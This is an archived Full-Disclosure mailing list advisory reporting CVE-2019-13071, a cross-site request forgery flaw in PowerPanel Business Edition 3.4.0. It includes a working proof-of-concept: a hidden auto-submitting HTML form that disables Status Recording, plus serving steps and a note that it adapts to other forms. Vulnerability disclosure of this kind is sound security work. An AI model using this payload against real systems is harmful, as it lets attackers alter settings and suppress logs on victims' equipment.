lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 9 Jul 2019 17:19:27 -0500
From: Joey Lane via Fulldisclosure <fulldisclosure@...lists.org>
To: fulldisclosure@...lists.org
Subject: [FD] PowerPanel Business Edition 3.4.0 - Cross Site Request Forgery

# Exploit Title: PowerPanel Business Edition 3.4.0 - Cross Site Request
Forgery
# Date: 7/9/2019
# Exploit Author: Joey Lane
# Vendor Homepage: https://www.cyberpowersystems.com
# Version: 3.4.0
# Tested on: Ubuntu 16.04
# CVE : CVE-2019-13071
# Reported to vendor on 5/25/2019, no acknowledgement.

The Agent/Center component of PowerPanel Business Edition is vulnerable to
cross site request forgery. This can be exploited by tricking an
authenticated user into visiting a web page controlled by a malicious
person.

The following example uses CSRF to disable Status Recording under the Logs
/ Settings page.  Create a file named 'csrf.html' on a local workstation
with the following contents:

<iframe style="display:none" name="csrf-frame"></iframe>
<div style="display: none;">
<form method='POST' action='http://(A VALID HOST
NAME):3052/agent/log_options' target="csrf-frame" id="csrf-form">
  <input type='hidden' name='value(recordingEnable)' value='no'>
  <input type='hidden' name='value(recordingInterval)' value='10'>
  <input type='hidden' name='value(periodToRemoveRecord)' value='2'>
  <input type='hidden' name='value(clearAllStatusLogs)' value='no'>
  <input type='hidden' name='value(type)' value='records'>
  <input type='hidden' name='value(action)' value='Apply'>
  <input type='hidden' name='value(button)' value='Apply'>
  <input type='submit' value='submit'>
</form>
</div>
<script>document.getElementById("csrf-form").submit()</script>

Serve the file using python or any other web server:

python -m SimpleHTTPServer 8000

Visit the local page in a browser while logged into PowerPanel Business
Edition:

http://localhost:8000/csrf.html

The hidden form is submitted in the background, and will disable Status
Recording.  This could be adapted to exploit other forms in the web
application as well.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists